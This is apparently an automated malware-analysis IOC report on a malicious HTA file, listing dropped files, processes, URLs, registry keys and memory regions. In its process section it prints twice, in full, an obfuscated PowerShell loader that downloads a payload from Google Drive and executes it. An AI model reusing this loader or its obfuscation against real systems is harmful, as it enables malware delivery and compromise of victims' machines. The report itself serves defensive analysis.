IOC Report
orden_0099896754537687897657436786756785654576.hta

loading gif

Files

File Path
Type
Category
Malicious
orden_0099896754537687897657436786756785654576.hta
HTML document, ASCII text, with CRLF line terminators
initial sample
malicious
C:\ProgramData\Microsoft\Network\Downloader\edb.log
data
dropped
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
Extensible storage engine DataBase, version 0x620, checksum 0x98589be0, page size 16384, DirtyShutdown, Windows version 10.0
dropped
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
modified
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bpbqmwxq.utz.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ivbvzgkv.hl5.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jx5qajjz.5iw.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ltlxalh1.220.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Roaming\Ponos.Lsi
ASCII text, with very long lines (65536), with no line terminators
dropped
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
JSON data
dropped
There are 2 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Windows\SysWOW64\mshta.exe
mshta.exe "C:\Users\user\Desktop\orden_0099896754537687897657436786756785654576.hta"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Ungelatinizables = 1;$fostrene='Substrin';$fostrene+='g';Function Skftendes($Kriminologien){$Svanehamme54=$Kriminologien.Length-$Ungelatinizables;For($Ruslandsrejsernes=5; $Ruslandsrejsernes -lt $Svanehamme54; $Ruslandsrejsernes+=(6)){$Forbudsbestemmelserne+=$Kriminologien.$fostrene.Invoke($Ruslandsrejsernes, $Ungelatinizables);}$Forbudsbestemmelserne;}function bifilar($Unkneaded){. ($Aaretags) ($Unkneaded);}$Capitalizable=Skftendes 'PotliMTr,ceoChirozAflb,i .prrlTraadlSexboaUnde,/Sk,lp5Killi.Terri0 Rger Kolb (,picuWildr iHelmen RatidBegy.oGratiwMothes Quiv Pos.vNF,ereTPrepo rbe1Angle0B rre.Tandl0Tog m; ,ham FilthWUnconiko,pen disc6Smakk4 A yn;Lager Dara,xMa.nm6v.rsh4canva;Grave BlunrUdovevKry.r:Grema1Gigas2hals 1Foxes.Roddi0H gei)Sikat TailsGUnholeDespec rattk BonnoEtuie/Udgy 2Bauck0K.ast1I,kol0 Pr,z0Termo1Medle0 nlea1 Bles FratrF Un.giSlaskr S afe Tilmfunculo Ude,xToxop/ Sptt1Idrif2.ftgt1 Ep t. G sg0 Pert ';$ergometercykelen=Skftendes 'Fors UCystosSamtie olkrS,ovl-StinkAFo,urg Le.eeInt,rnBakketChlor ';$Enebrrets=Skftendes 'InstihSensitStrantUnexepStrubs Inte:P,yto/Ansva/ Noncd sem.r,ettoiStyrivLbehjeU.byt.Pole g BrisoR.dioo ndergDrosol PrizeIndex.transcHusbuo roglm B.ob/SvvefuTen.ncprogn?Had ne,iunixAntidpEnga,oMoater SofttFreds=PhytodInf,roBiogrwK.ejnnSand l Eft o Teleagastrdoldsa&Pi.niiResoudG and= ight1 Ur.naQueriFCoactW Sept_CyprabTromsUkun,tR Vi dNStok.XFr.it9EpipitOver.F oncoOpo.yg3 AntiOStrygOPsyc,2InvenSRibboR intexJivinjDeforlDobb.cSe.mlN ThinKS rti9 .arru Mer.x UdgahGld.taSynontSvin,bspec. ';$Foliose=Skftendes 'Lydis>Upbr. ';$Aaretags=Skftendes 'Kn gliFlereeNeutrx Azim ';$Luminarism = Skftendes 'PinnieFeriec De.thFl efoBagga Vaad% WortaSagebpRkee,pLandsdPersoaEnhedt Nonda M.do% Begy\FoldnP emio PrisnInturoLskedsCo lb.BannuLNonlosSpangiDimme Dra,e&Unlik& Appe ModereTutt.c Sh,khUdenloGangs Dext$St re ';bifilar (Skftendes 'Mexic$ReclugRumerl bogho A.stbEpiotaRverhlSentr:Trup.B ilcratebrelDyarclCrypto ersinSclereMonit=Dogli(,argicColasmfactodSmak, phono/AnnsocBugsp Ox da$Hypa LPo.duuPaea m KaloiTypolnRevera AntirMineri MisasTalemmHjlpe)krges ');bifilar (Skftendes 'z.nev$FictigUtrosl R,oto Sp.gbP,etea Salpl Lyst:MarshzGri.ao JvnsoPyj msForurpDatamo.vnfrrAmbroi ApplfCateceHemoerIn enophotou.remasTeake= ldef$DialuESammenUndive Pi,sbChallrChemorMidd.e SpidtOutdrsAffix. Fr ssSvarspR,stal.emimiDe.artIagtt(Brier$cl glFBuslioBioryl AccuiPlagio SublsCorpseAnago)Lystb ');$Enebrrets=$zoosporiferous[0];bifilar (Skftendes ' Jyde$F stfg.eltslSygemo sympb Sk iaKontalKance:GejstP Des,oTilnalU.actkIndstaA,lnneAutoprTgt.nn.rakbeEpicasUddan= SandN,ejseeMach,wNonsy-K.ybbOU,skibRaastjsysteeVi.kecKo,rit Horn epichSEanliy.orsis SknhtMidtpeFoelgm Soom.TeletNPhlebe Mi,itImman.BlrebWEr theMetrobLagerCRei,olUncomi UdkieB.ndenPlaygtFilmk ');bifilar (Skftendes 'Stoma$VendiPMistro RapulEnchrk Tidsa .imreFash rUrinonfledfe entrsPhore. KendHDu,lieMalaraUn,urdOmstneUnfumr Riv.sStadt[ Tai,$BearneImponrar ejgAnsvao DiskmBemadeTrstetexertePatrirAdsorcA mrkyBreplkFeatue BlealcolumeHylesnPerso] R,ar=sella$IltetC Udtra FatipUforsiCausttEupteaSp gel RungiC,ratzgrihyaUnd,obHu.drlUnvigeBizar ');$Cancerne63=Skftendes '.uabiP WindoMirkilPasodkis.chaNakkieDecomrMedalnhy,ere TrklsSandw.KonomD TranoAntinwOpmannRessalOpgavokamasaDiioddDreilFNamagi UsselB.rneeFlag.(Ulovm$,taurE Ok.endecoceUnhoubCitrorAvitarKlt ieTr ketVirils Un v, S.de$I.oprAGratip Pra h adeatLbelshMimreo F,reiGymnad Anme) Prim ';$Cancerne63=$Ballone[1]+$Cancerne63;$Aphthoid=$Ballone[0];bifilar (Skftendes ' Soci$SplasgNon alBrudeoTryllb OpmraUgyldl Lig : unacQ .tudu Ja teHelonrli sscF,nani,orelvGutteoDobberOmposo T deuKonstsfrilu=,edde(PhotoTHek oeEfters.anset,orre-LysogPOprulaVasketregneh Morf Anore$ VeloAvaabep,lanihEwardtNuttehimparoT lehi.ychedCylin)Seism ');while (!$Quercivorous) {bifilar (Skftendes ' Inte$forblgAcetolReflooAbs,ibJea,oaTimewlHolme:IdrtsF,sophlUndisiEudemnTetratIlmarrArthr=Arryt$EasygtAstherHjertu unqueGalax ') ;bifilar $Cancerne63;bifilar (Skftendes 'SkiftSAnsvatCoac.aSalvirSkydetKruci-DepraSU.repl ,eroe,ontoe M nspSlide dishw4Analy ');bifilar (Skftendes 'Maa.e$UniongRef.al ManuoFri,rbOdonta NgstlO.olo:GabonQPatoluPossye Nat.rFlanncunfeai.alesvH biro UroprTvresoSur,iuNordvsTrold= Dicy(FrsteTmicroe eppesColomt Veks- EntaPDol,haA.sketForsvhCo,ts Soare$EvakuABallepaccidhKo ontMainoh rudgoInc miHnsefdMind.),krfn ') ;bifilar (Skftendes 'Count$ uning kuldlHe ero olpobFolkea rilll Sel.:RaffiLFaktuuFje,kmSphensSkulkkGalgeeSilu.rForl i UrsoeAcantt,indbsEx.rg= Brut$ Men gDyb alPamaqoBistabSkjula.allilIndhu:Br,dsaEnchyn SluttBor leValetlSoloeoNteunc KrydaGcdimtVrgeliAtomfoPeramnRev k+Dipte+Succe%Antih$ ephrzSmi koP,ovoo Uvi sWithgpOph hoCourtrKvadri Vizaf.egameParodrInd.roCyan u Momss Expl.Sp,itcUnbeloE.enluOblignUnre tEukal ') ;$Enebrrets=$zoosporiferous[$Lumskeriets];}bifilar (Skftendes 'Karda$ I.sogProcol Pengokorreb Stofa mic,lM sco:far,nTPieria ,ynap UbedmDecomoNysges Simit Disp Kalk= Havm ,imeyGSpilfeArbejtRe.la-.igarCPuf,ioTalb.n UdlntAstore Xy on ,ufftNom,d Massa$SeasiArokerpPickah Intet velahFiltro,eadwiBirkedUnqua ');bifilar (Skftendes 'Ptery$ Airmg ilhulEyestoCan.eb SnataWels.l Jdek:My.toTAbscirSp ldkSkolekStte.eMissinBundsaUnst atriunlTilbaeTypognOv,rb cohe=Dyrpl .emin[FlervSHaubeyMaurys TematJag.keRestymBrakn.DemonCDinamoBo.tnnExho.v .ceteIterarKrokot S at]ge.im: Ma.m:TombsF C,rcrEttinoYankemUd.kiBElegia L desTa.saePri s6Slagp4 GlutSSlowntTurbirCruseibossenFejlmgDistr(Equan$BorgeTSkrgaaArb.jp ,ugnmLektooNichosDealltNorg,)Bros ');bifilar (Skftendes 'Count$ drgtg Rhi lAtteno rovebNonanaM.rislTun,i: ortiLStolenCushilApoteiIn,skgSundhsLi,fstTusse Gr te=uto.i .inki[FremsSCicadyS,rudsin,ert teameDmmtimCornc. VrdiT nacaeV,gttxMestetGartn.UnoraE In,snKravecAnlbeo unifd.krveiBrne.nBasalgUpfee]Dinge:Skink:HelaaAProvoS ZinkCEpistI l ndIClubr.Vive.G.iploeNonsatApoteS.nblotHeptar okhaiTil gnIldfag.anit(Antik$BadevTAu.tirg,ntlkInduikc eatePr,grnud.unaCoiliaBele l.lokaeLi ten V rs)En ka ');bifilar (Skftendes ' auri$AleutgTrykklspinooFrankbrustia c smlSmert:PreluWFiskea MassistovtrPrp rsAutom=Bjrnk$Segn L ForsnAfblalUdtnkiPrewagUlykks Med,tBanne.EkskosEpipouHalebbafskasMisretCe.serdistiiUna.tnSkrkfgF etf( Ment3Skrot0Re eg9Camph8 Udmu1 .rec5bunk,,Unmor2Misfo8.alib4Stuea4Sy ph0S.llo) Skj. ');bifilar $Wairs;"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Ungelatinizables = 1;$fostrene='Substrin';$fostrene+='g';Function Skftendes($Kriminologien){$Svanehamme54=$Kriminologien.Length-$Ungelatinizables;For($Ruslandsrejsernes=5; $Ruslandsrejsernes -lt $Svanehamme54; $Ruslandsrejsernes+=(6)){$Forbudsbestemmelserne+=$Kriminologien.$fostrene.Invoke($Ruslandsrejsernes, $Ungelatinizables);}$Forbudsbestemmelserne;}function bifilar($Unkneaded){. ($Aaretags) ($Unkneaded);}$Capitalizable=Skftendes 'PotliMTr,ceoChirozAflb,i .prrlTraadlSexboaUnde,/Sk,lp5Killi.Terri0 Rger Kolb (,picuWildr iHelmen RatidBegy.oGratiwMothes Quiv Pos.vNF,ereTPrepo rbe1Angle0B rre.Tandl0Tog m; ,ham FilthWUnconiko,pen disc6Smakk4 A yn;Lager Dara,xMa.nm6v.rsh4canva;Grave BlunrUdovevKry.r:Grema1Gigas2hals 1Foxes.Roddi0H gei)Sikat TailsGUnholeDespec rattk BonnoEtuie/Udgy 2Bauck0K.ast1I,kol0 Pr,z0Termo1Medle0 nlea1 Bles FratrF Un.giSlaskr S afe Tilmfunculo Ude,xToxop/ Sptt1Idrif2.ftgt1 Ep t. G sg0 Pert ';$ergometercykelen=Skftendes 'Fors UCystosSamtie olkrS,ovl-StinkAFo,urg Le.eeInt,rnBakketChlor ';$Enebrrets=Skftendes 'InstihSensitStrantUnexepStrubs Inte:P,yto/Ansva/ Noncd sem.r,ettoiStyrivLbehjeU.byt.Pole g BrisoR.dioo ndergDrosol PrizeIndex.transcHusbuo roglm B.ob/SvvefuTen.ncprogn?Had ne,iunixAntidpEnga,oMoater SofttFreds=PhytodInf,roBiogrwK.ejnnSand l Eft o Teleagastrdoldsa&Pi.niiResoudG and= ight1 Ur.naQueriFCoactW Sept_CyprabTromsUkun,tR Vi dNStok.XFr.it9EpipitOver.F oncoOpo.yg3 AntiOStrygOPsyc,2InvenSRibboR intexJivinjDeforlDobb.cSe.mlN ThinKS rti9 .arru Mer.x UdgahGld.taSynontSvin,bspec. ';$Foliose=Skftendes 'Lydis>Upbr. ';$Aaretags=Skftendes 'Kn gliFlereeNeutrx Azim ';$Luminarism = Skftendes 'PinnieFeriec De.thFl efoBagga Vaad% WortaSagebpRkee,pLandsdPersoaEnhedt Nonda M.do% Begy\FoldnP emio PrisnInturoLskedsCo lb.BannuLNonlosSpangiDimme Dra,e&Unlik& Appe ModereTutt.c Sh,khUdenloGangs Dext$St re ';bifilar (Skftendes 'Mexic$ReclugRumerl bogho A.stbEpiotaRverhlSentr:Trup.B ilcratebrelDyarclCrypto ersinSclereMonit=Dogli(,argicColasmfactodSmak, phono/AnnsocBugsp Ox da$Hypa LPo.duuPaea m KaloiTypolnRevera AntirMineri MisasTalemmHjlpe)krges ');bifilar (Skftendes 'z.nev$FictigUtrosl R,oto Sp.gbP,etea Salpl Lyst:MarshzGri.ao JvnsoPyj msForurpDatamo.vnfrrAmbroi ApplfCateceHemoerIn enophotou.remasTeake= ldef$DialuESammenUndive Pi,sbChallrChemorMidd.e SpidtOutdrsAffix. Fr ssSvarspR,stal.emimiDe.artIagtt(Brier$cl glFBuslioBioryl AccuiPlagio SublsCorpseAnago)Lystb ');$Enebrrets=$zoosporiferous[0];bifilar (Skftendes ' Jyde$F stfg.eltslSygemo sympb Sk iaKontalKance:GejstP Des,oTilnalU.actkIndstaA,lnneAutoprTgt.nn.rakbeEpicasUddan= SandN,ejseeMach,wNonsy-K.ybbOU,skibRaastjsysteeVi.kecKo,rit Horn epichSEanliy.orsis SknhtMidtpeFoelgm Soom.TeletNPhlebe Mi,itImman.BlrebWEr theMetrobLagerCRei,olUncomi UdkieB.ndenPlaygtFilmk ');bifilar (Skftendes 'Stoma$VendiPMistro RapulEnchrk Tidsa .imreFash rUrinonfledfe entrsPhore. KendHDu,lieMalaraUn,urdOmstneUnfumr Riv.sStadt[ Tai,$BearneImponrar ejgAnsvao DiskmBemadeTrstetexertePatrirAdsorcA mrkyBreplkFeatue BlealcolumeHylesnPerso] R,ar=sella$IltetC Udtra FatipUforsiCausttEupteaSp gel RungiC,ratzgrihyaUnd,obHu.drlUnvigeBizar ');$Cancerne63=Skftendes '.uabiP WindoMirkilPasodkis.chaNakkieDecomrMedalnhy,ere TrklsSandw.KonomD TranoAntinwOpmannRessalOpgavokamasaDiioddDreilFNamagi UsselB.rneeFlag.(Ulovm$,taurE Ok.endecoceUnhoubCitrorAvitarKlt ieTr ketVirils Un v, S.de$I.oprAGratip Pra h adeatLbelshMimreo F,reiGymnad Anme) Prim ';$Cancerne63=$Ballone[1]+$Cancerne63;$Aphthoid=$Ballone[0];bifilar (Skftendes ' Soci$SplasgNon alBrudeoTryllb OpmraUgyldl Lig : unacQ .tudu Ja teHelonrli sscF,nani,orelvGutteoDobberOmposo T deuKonstsfrilu=,edde(PhotoTHek oeEfters.anset,orre-LysogPOprulaVasketregneh Morf Anore$ VeloAvaabep,lanihEwardtNuttehimparoT lehi.ychedCylin)Seism ');while (!$Quercivorous) {bifilar (Skftendes ' Inte$forblgAcetolReflooAbs,ibJea,oaTimewlHolme:IdrtsF,sophlUndisiEudemnTetratIlmarrArthr=Arryt$EasygtAstherHjertu unqueGalax ') ;bifilar $Cancerne63;bifilar (Skftendes 'SkiftSAnsvatCoac.aSalvirSkydetKruci-DepraSU.repl ,eroe,ontoe M nspSlide dishw4Analy ');bifilar (Skftendes 'Maa.e$UniongRef.al ManuoFri,rbOdonta NgstlO.olo:GabonQPatoluPossye Nat.rFlanncunfeai.alesvH biro UroprTvresoSur,iuNordvsTrold= Dicy(FrsteTmicroe eppesColomt Veks- EntaPDol,haA.sketForsvhCo,ts Soare$EvakuABallepaccidhKo ontMainoh rudgoInc miHnsefdMind.),krfn ') ;bifilar (Skftendes 'Count$ uning kuldlHe ero olpobFolkea rilll Sel.:RaffiLFaktuuFje,kmSphensSkulkkGalgeeSilu.rForl i UrsoeAcantt,indbsEx.rg= Brut$ Men gDyb alPamaqoBistabSkjula.allilIndhu:Br,dsaEnchyn SluttBor leValetlSoloeoNteunc KrydaGcdimtVrgeliAtomfoPeramnRev k+Dipte+Succe%Antih$ ephrzSmi koP,ovoo Uvi sWithgpOph hoCourtrKvadri Vizaf.egameParodrInd.roCyan u Momss Expl.Sp,itcUnbeloE.enluOblignUnre tEukal ') ;$Enebrrets=$zoosporiferous[$Lumskeriets];}bifilar (Skftendes 'Karda$ I.sogProcol Pengokorreb Stofa mic,lM sco:far,nTPieria ,ynap UbedmDecomoNysges Simit Disp Kalk= Havm ,imeyGSpilfeArbejtRe.la-.igarCPuf,ioTalb.n UdlntAstore Xy on ,ufftNom,d Massa$SeasiArokerpPickah Intet velahFiltro,eadwiBirkedUnqua ');bifilar (Skftendes 'Ptery$ Airmg ilhulEyestoCan.eb SnataWels.l Jdek:My.toTAbscirSp ldkSkolekStte.eMissinBundsaUnst atriunlTilbaeTypognOv,rb cohe=Dyrpl .emin[FlervSHaubeyMaurys TematJag.keRestymBrakn.DemonCDinamoBo.tnnExho.v .ceteIterarKrokot S at]ge.im: Ma.m:TombsF C,rcrEttinoYankemUd.kiBElegia L desTa.saePri s6Slagp4 GlutSSlowntTurbirCruseibossenFejlmgDistr(Equan$BorgeTSkrgaaArb.jp ,ugnmLektooNichosDealltNorg,)Bros ');bifilar (Skftendes 'Count$ drgtg Rhi lAtteno rovebNonanaM.rislTun,i: ortiLStolenCushilApoteiIn,skgSundhsLi,fstTusse Gr te=uto.i .inki[FremsSCicadyS,rudsin,ert teameDmmtimCornc. VrdiT nacaeV,gttxMestetGartn.UnoraE In,snKravecAnlbeo unifd.krveiBrne.nBasalgUpfee]Dinge:Skink:HelaaAProvoS ZinkCEpistI l ndIClubr.Vive.G.iploeNonsatApoteS.nblotHeptar okhaiTil gnIldfag.anit(Antik$BadevTAu.tirg,ntlkInduikc eatePr,grnud.unaCoiliaBele l.lokaeLi ten V rs)En ka ');bifilar (Skftendes ' auri$AleutgTrykklspinooFrankbrustia c smlSmert:PreluWFiskea MassistovtrPrp rsAutom=Bjrnk$Segn L ForsnAfblalUdtnkiPrewagUlykks Med,tBanne.EkskosEpipouHalebbafskasMisretCe.serdistiiUna.tnSkrkfgF etf( Ment3Skrot0Re eg9Camph8 Udmu1 .rec5bunk,,Unmor2Misfo8.alib4Stuea4Sy ph0S.llo) Skj. ');bifilar $Wairs;"
malicious
C:\Program Files (x86)\Windows Mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Ponos.Lsi && echo $"
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Ponos.Lsi && echo $"

URLs

Name
IP
Malicious
http://pesterbdd.com/images/Pester.png
unknown
malicious
https://www.google.com
unknown
http://nuget.org/NuGet.exe
unknown
https://g.live.com/odclientsettings/Prod1C:
unknown
https://aka.ms/pscore6lB
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://go.micro
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://contoso.com/License
unknown
https://contoso.com/Icon
unknown
https://drive.google.com
unknown
https://drive.usercontent.google.com
unknown
https://g.live.com/odclientsettings/ProdV21C:
unknown
http://crl.ver)
unknown
https://apis.google.com
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://github.com/Pester/Pester
unknown
http://ip-api.com/line/?fields=hosting
208.95.112.1
There are 9 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
drive.google.com
172.253.124.102
drive.usercontent.google.com
173.194.219.132
ip-api.com
208.95.112.1

IPs

IP
Domain
Country
Malicious
208.95.112.1
ip-api.com
United States
172.253.124.102
drive.google.com
United States
127.0.0.1
unknown
unknown
173.194.219.132
drive.usercontent.google.com
United States

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
PerfMMFileName
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
FileDirectory
There are 20 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
585C000
trusted library allocation
page read and write
malicious
557B000
trusted library allocation
page read and write
malicious
CC71000
direct allocation
page execute and read and write
malicious
8620000
direct allocation
page execute and read and write
malicious
5541000
heap
page read and write
BDDC17D000
stack
page read and write
7022000
trusted library allocation
page read and write
86A0000
direct allocation
page read and write
67F4000
heap
page read and write
26B11000
trusted library allocation
page read and write
B871000
direct allocation
page execute and read and write
8B4E000
heap
page read and write
BDDBE7E000
unkown
page readonly
6EC5D000
unkown
page read and write
8ED000
trusted library allocation
page execute and read and write
1BF4111A000
heap
page read and write
2F50000
heap
page read and write
8680000
direct allocation
page read and write
86C000
stack
page read and write
7540000
trusted library allocation
page read and write
802D000
stack
page read and write
26AF6000
trusted library allocation
page read and write
1BF45D70000
trusted library allocation
page read and write
7060000
trusted library allocation
page read and write
6D8E000
heap
page read and write
1BF45C41000
trusted library allocation
page read and write
27180000
trusted library allocation
page read and write
684E000
heap
page read and write
6D00000
heap
page read and write
8A9000
stack
page read and write
8B4E000
heap
page read and write
8A97000
heap
page read and write
5584000
heap
page read and write
1BF45C40000
trusted library allocation
page read and write
6807000
heap
page read and write
8CA3000
heap
page read and write
43D6000
trusted library allocation
page read and write
7AED000
stack
page read and write
1BF45E2C000
heap
page read and write
67EB000
heap
page read and write
2BCE000
stack
page read and write
2FA7000
heap
page read and write
26BC0000
trusted library allocation
page read and write
4694000
trusted library allocation
page read and write
5536000
heap
page read and write
4E36000
trusted library allocation
page read and write
6905000
heap
page execute and read and write
3047000
heap
page read and write
7190000
trusted library allocation
page read and write
34CA000
heap
page read and write
8BFB000
heap
page read and write
2F58000
heap
page read and write
25B58000
trusted library allocation
page read and write
8C41000
heap
page read and write
8F0000
trusted library allocation
page read and write
C08000
trusted library allocation
page read and write
2F92000
heap
page read and write
26AF0000
trusted library allocation
page read and write
8C71000
heap
page read and write
BDDC57E000
unkown
page readonly
26C82000
heap
page read and write
68AE000
heap
page read and write
6900000
heap
page execute and read and write
9080000
direct allocation
page read and write
684A000
stack
page read and write
1BF40876000
heap
page read and write
8B36000
heap
page read and write
27780000
trusted library allocation
page read and write
BDDB2DB000
stack
page read and write
4E0D000
trusted library allocation
page read and write
5597000
heap
page read and write
6D73000
heap
page read and write
68A3000
heap
page read and write
24BEA000
trusted library allocation
page read and write
2B8E000
unkown
page read and write
93F0000
heap
page read and write
B30000
trusted library allocation
page read and write
27770000
trusted library allocation
page read and write
90D0000
direct allocation
page read and write
1BF41113000
heap
page read and write
1BF45D10000
trusted library allocation
page read and write
553B000
heap
page read and write
8C59000
heap
page read and write
8BAC000
heap
page read and write
68E0000
heap
page execute and read and write
8B55000
heap
page read and write
27760000
trusted library allocation
page read and write
27190000
trusted library allocation
page read and write
24AC0000
trusted library allocation
page read and write
24908000
stack
page read and write
73E0000
trusted library allocation
page read and write
A28000
heap
page read and write
8AAE000
heap
page read and write
921E000
stack
page read and write
4FBF000
heap
page read and write
9137000
heap
page read and write
86B0000
direct allocation
page read and write
3031000
heap
page read and write
1BF45BC0000
trusted library allocation
page read and write
314E000
stack
page read and write
682B000
heap
page read and write
5553000
heap
page read and write
277A0000
trusted library allocation
page read and write
277A0000
trusted library allocation
page read and write
5523000
heap
page read and write
8B57000
heap
page read and write
54A1000
heap
page read and write
6D4000
heap
page read and write
72CB000
heap
page read and write
271A0000
trusted library allocation
page read and write
86F0000
direct allocation
page read and write
271A0000
trusted library allocation
page read and write
8C12000
heap
page read and write
1BF41BB0000
trusted library allocation
page read and write
6961000
remote allocation
page execute and read and write
2BF0000
heap
page read and write
8C70000
heap
page read and write
571E000
stack
page read and write
27170000
trusted library allocation
page read and write
7FBA0000
trusted library allocation
page execute and read and write
8C6D000
heap
page read and write
303D000
heap
page read and write
AE0000
heap
page read and write
1BF45ED1000
heap
page read and write
8670000
direct allocation
page read and write
8C55000
heap
page read and write
480000
heap
page read and write
6D8D000
stack
page read and write
8C44000
heap
page read and write
8C12000
heap
page read and write
8BBA000
heap
page read and write
7180000
trusted library allocation
page read and write
1BF408A2000
heap
page read and write
3035000
heap
page read and write
8A30000
heap
page read and write
247B0000
remote allocation
page read and write
5843000
trusted library allocation
page read and write
8BAC000
heap
page read and write
6EC56000
unkown
page readonly
8B4B000
heap
page read and write
BDDD37E000
unkown
page readonly
60C000
heap
page read and write
B48000
heap
page read and write
8D4000
trusted library allocation
page read and write
1BF45EC8000
heap
page read and write
1BF45C60000
trusted library allocation
page read and write
4800000
trusted library allocation
page read and write
686E000
heap
page read and write
943A000
heap
page read and write
BDDC8FE000
stack
page read and write
67ED000
heap
page read and write
27770000
trusted library allocation
page read and write
AAE000
stack
page read and write
271A0000
trusted library allocation
page read and write
4698000
trusted library allocation
page read and write
6EC41000
unkown
page execute read
8C7E000
heap
page read and write
5557000
heap
page read and write
85D0000
trusted library allocation
page read and write
BDDD279000
stack
page read and write
26D01000
heap
page read and write
6800000
heap
page read and write
553E000
heap
page read and write
1BF408FF000
heap
page read and write
1BF40897000
heap
page read and write
7D61000
remote allocation
page execute and read and write
557D000
heap
page read and write
52C4000
heap
page read and write
277C0000
trusted library allocation
page read and write
271A0000
trusted library allocation
page read and write
4ED7000
trusted library allocation
page read and write
2F91000
heap
page read and write
743E000
stack
page read and write
689B000
heap
page read and write
5523000
heap
page read and write
8BAC000
heap
page read and write
26B16000
trusted library allocation
page read and write
246EF000
stack
page read and write
844E000
stack
page read and write
7BB4000
heap
page read and write
6F8E000
stack
page read and write
73F0000
trusted library allocation
